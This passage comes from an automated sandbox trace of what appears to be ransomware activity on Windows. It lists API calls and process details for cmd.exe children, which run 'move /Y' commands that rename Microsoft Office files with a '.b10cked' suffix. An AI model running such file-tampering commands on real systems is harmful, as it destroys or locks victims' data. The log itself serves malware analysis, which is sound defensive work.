returned 4 [0162.405] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0162.405] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0162.405] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0162.405] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0162.405] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0162.405] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0162.405] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0162.406] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0162.406] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0162.407] GetConsoleTitleW (in: lpConsoleTitle=0x320930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0162.510] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0162.510] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0162.510] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0162.510] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0162.511] _wcsicmp (_String1="move", _String2=")") returned 68 [0162.511] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0162.511] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0162.511] _wcsicmp (_String1="IF", _String2="move") returned -4 [0162.511] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0162.511] _wcsicmp (_String1="REM", _String2="move") returned 5 [0162.511] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0162.515] GetConsoleTitleW (in: lpConsoleTitle=0x18f860, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0162.516] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0162.516] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0162.516] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0162.516] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0162.516] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0162.516] _wcsicmp (_String1="move", _String2="CD") returned 10 [0162.516] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0162.516] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0162.516] _wcsicmp (_String1="move", _String2="REN") returned -5 [0162.516] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0162.516] _wcsicmp (_String1="move", _String2="SET") returned -6 [0162.516] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0162.516] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0162.516] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0162.516] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0162.516] _wcsicmp (_String1="move", _String2="MD") returned 11 [0162.516] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0162.516] _wcsicmp (_String1="move", _String2="RD") returned -5 [0162.516] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0162.516] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0162.516] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0162.516] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0162.516] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0162.516] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0162.516] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0162.516] _wcsicmp (_String1="move", _String2="VER") returned -9 [0162.516] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0162.516] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0162.516] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0162.516] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0162.517] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0162.517] _wcsicmp (_String1="move", _String2="START") returned -6 [0162.517] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0162.517] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0162.517] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0162.518] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0162.518] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0162.518] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f61c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f614, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18f614*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0162.519] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0162.520] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0162.520] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0162.520] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0162.520] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0162.520] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0162.520] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0162.520] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0162.520] _wcsicmp (_String1="XLSLIC~1.TRX", _String2=".") returned 74 [0162.520] _wcsicmp (_String1="XLSLIC~1.TRX", _String2="..") returned 74 [0162.520] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLIC~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\xlslic~1.trx")) returned 0x2020 [0162.521] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x331f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0162.521] SetErrorMode (uMode=0x0) returned 0x0 [0162.521] SetErrorMode (uMode=0x1) returned 0x0 [0162.521] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLIC~1.TRX", nBufferLength=0x104, lpBuffer=0x18efa4, lpFilePart=0x18ef8c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLIC~1.TRX", lpFilePart=0x18ef8c*="XLSLIC~1.TRX") returned 0x3c [0162.521] SetErrorMode (uMode=0x0) returned 0x1 [0162.521] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0162.521] _wcsicmp (_String1="XLSLIC~1.TRX", _String2=".") returned 74 [0162.521] _wcsicmp (_String1="XLSLIC~1.TRX", _String2="..") returned 74 [0162.521] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLIC~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\xlslic~1.trx")) returned 0x2020 [0162.521] SetErrorMode (uMode=0x0) returned 0x0 [0162.521] SetErrorMode (uMode=0x1) returned 0x0 [0162.521] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLIC~1.TRX", nBufferLength=0x104, lpBuffer=0x18f420, lpFilePart=0x18f1b8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLIC~1.TRX", lpFilePart=0x18f1b8*="XLSLIC~1.TRX") returned 0x3c [0162.521] SetErrorMode (uMode=0x0) returned 0x1 [0162.521] SetErrorMode (uMode=0x0) returned 0x0 [0162.521] SetErrorMode (uMode=0x1) returned 0x0 [0162.522] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLICER.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x18f628, lpFilePart=0x18f1b8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLICER.DLL.trx_dll.b10cked", lpFilePart=0x18f1b8*="XLSLICER.DLL.trx_dll.b10cked") returned 0x4c [0162.522] SetErrorMode (uMode=0x0) returned 0x1 [0162.522] SetLastError (dwErrCode=0x0) [0162.522] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLICER.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\xlslicer.dll.trx_dll.b10cked")) returned 0xffffffff [0162.522] GetLastError () returned 0x2 [0162.522] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLIC~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x18eb34, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eb34) returned 0x332130 [0162.522] FindNextFileW (in: hFindFile=0x332130, lpFindFileData=0x18eb34 | out: lpFindFileData=0x18eb34) returned 0 [0162.523] GetLastError () returned 0x12 [0162.523] FindClose (in: hFindFile=0x332130 | out: hFindFile=0x332130) returned 1 [0162.524] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLIC~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x331cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x331cc0) returned 0x332130 [0162.524] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLICER.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x18edcc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLICER.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4c [0162.524] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLICER.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x18edcc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLICER.DLL.trx_dll", lpFilePart=0x0) returned 0x44 [0162.524] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLICER.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\xlslicer.dll.trx_dll")) returned 0x2020 [0162.524] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLICER.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\xlslicer.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLICER.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\xlslicer.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0162.525] FindClose (in: hFindFile=0x332130 | out: hFindFile=0x332130) returned 1 [0162.525] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x18ed80 | out: _Buffer=" 1") returned 9 [0162.525] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.525] GetFileType (hFile=0x7) returned 0x2 [0162.525] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0162.526] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18ed0c | out: lpMode=0x18ed0c) returned 1 [0162.526] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.526] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18ed40 | out: lpConsoleScreenBufferInfo=0x18ed40) returned 1 [0162.526] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0162.526] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x18ed80 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0162.526] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x18ed64, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x18ed64*=0x1a) returned 1 [0162.527] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.527] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0162.527] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.527] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0162.527] _get_osfhandle (_FileHandle=0) returned 0x3 [0162.527] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0162.527] SetConsoleInputExeNameW () returned 0x1 [0162.527] GetConsoleOutputCP () returned 0x1b5 [0162.527] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0162.527] SetThreadUILanguage (LangId=0x0) returned 0x409 [0162.527] exit (_Code=0) Process: id = "278" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b40" os_pid = "0x8f0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELO~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELOPR.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22331 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22332 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22333 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22334 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 22335 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 22336 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22337 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22338 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22339 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 22340 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 22421 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 22422 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 22423 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 22424 start_va = 0x270000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 22425 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 22426 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 22427 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 22428 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 22429 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 22430 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 22431 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 22432 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 22433 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 22434 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 22435 start_va = 0x280000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 22436 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 22437 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 22438 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 22439 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 22440 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 22441 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 22442 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 22443 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 22444 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Thread: id = 342 os_tid = 0x8e4 [0162.432] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf7d4 | out: lpSystemTimeAsFileTime=0x1cf7d4*(dwLowDateTime=0x9a30d040, dwHighDateTime=0x1d440a9)) [0162.432] GetCurrentProcessId () returned 0x8f0 [0162.432] GetCurrentThreadId () returned 0x8e4 [0162.432] GetTickCount () returned 0x313be [0162.432] QueryPerformanceCounter (in: lpPerformanceCount=0x1cf7cc | out: lpPerformanceCount=0x1cf7cc*=21922099278) returned 1 [0162.433] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0162.433] __set_app_type (_Type=0x1) [0162.433] __p__fmode () returned 0x76b331f4 [0162.433] __p__commode () returned 0x76b331fc [0162.433] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0162.433] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0162.433] GetCurrentThreadId () returned 0x8e4 [0162.433] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x8e4) returned 0x38 [0162.433] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0162.433] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0162.433] SetThreadUILanguage (LangId=0x0) returned 0x409 [0162.433] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0162.433] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cf764 | out: phkResult=0x1cf764*=0x0) returned 0x2 [0162.434] VirtualQuery (in: lpAddress=0x1cf79b, lpBuffer=0x1cf734, dwLength=0x1c | out: lpBuffer=0x1cf734*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.434] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cf734, dwLength=0x1c | out: lpBuffer=0x1cf734*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0162.434] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cf734, dwLength=0x1c | out: lpBuffer=0x1cf734*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0162.434] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cf734, dwLength=0x1c | out: lpBuffer=0x1cf734*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.434] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cf734, dwLength=0x1c | out: lpBuffer=0x1cf734*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c [0162.434] GetConsoleOutputCP () returned 0x1b5 [0162.434] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0162.434] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0162.434] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.434] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0162.434] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.434] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0162.435] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.435] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0162.435] _get_osfhandle (_FileHandle=0) returned 0x3 [0162.435] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0162.435] _get_osfhandle (_FileHandle=0) returned 0x3 [0162.435] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0162.435] GetEnvironmentStringsW () returned 0x360210* [0162.435] FreeEnvironmentStringsW (penv=0x360210) returned 1 [0162.436] GetEnvironmentStringsW () returned 0x360210* [0162.436] FreeEnvironmentStringsW (penv=0x360210) returned 1 [0162.436] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce6d4 | out: 